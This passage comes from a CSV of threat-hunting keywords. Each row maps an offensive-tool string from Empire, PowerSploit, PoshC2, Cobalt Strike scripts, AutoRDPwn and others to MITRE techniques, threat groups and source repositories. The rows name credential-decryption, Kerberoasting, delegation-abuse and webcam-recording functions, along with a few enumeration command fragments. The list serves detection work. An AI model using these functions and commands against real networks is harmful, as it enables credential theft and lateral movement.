Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*Get-DCBadPwdCount*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DecodedPassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-DecodedPassword*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-DecryptedCpassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-DecryptedCpassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DecryptedPassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-DecryptedPassword*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-DecryptedSitelistPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-delegation *All*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*get-delegation *Unconstrained*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*Get-DFSshare*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-DiscosdurosGet-PSDrive*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*getdllbaseaddress*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-dodgyprocesses*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-DomainAdmins.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*Get-DomainComputer -TrustedToAuth | select name","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-DomainDFSShareV1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainDFSShareV2*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainForeignGroupMember*","offensive_tool_keyword","AD exploitation cheat sheet","Abusing inter-forest trust Powersploit","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-DomainManagedSecurityGroup*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainObjectACL -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainSearcher*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*GetDomainsForEnumeration*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Get-DomainSpn*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLInstanceDomain.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getdomainspnticket*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","BloodHound","Kerberoasting With PowerView","T1558 - T1208 - T1552","TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainUser -KerberosPreuthNotRequired -Verbose*","greyware_tool_keyword","powershell","Powerview Enumerate users","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-DomainUser -TrustedToAuth | select userprincipalname","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-DXWebcamVideo.ps1*","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","8","1","68","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z" +"*getent passwd | cut -d: -f1*","greyware_tool_keyword","getent","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - 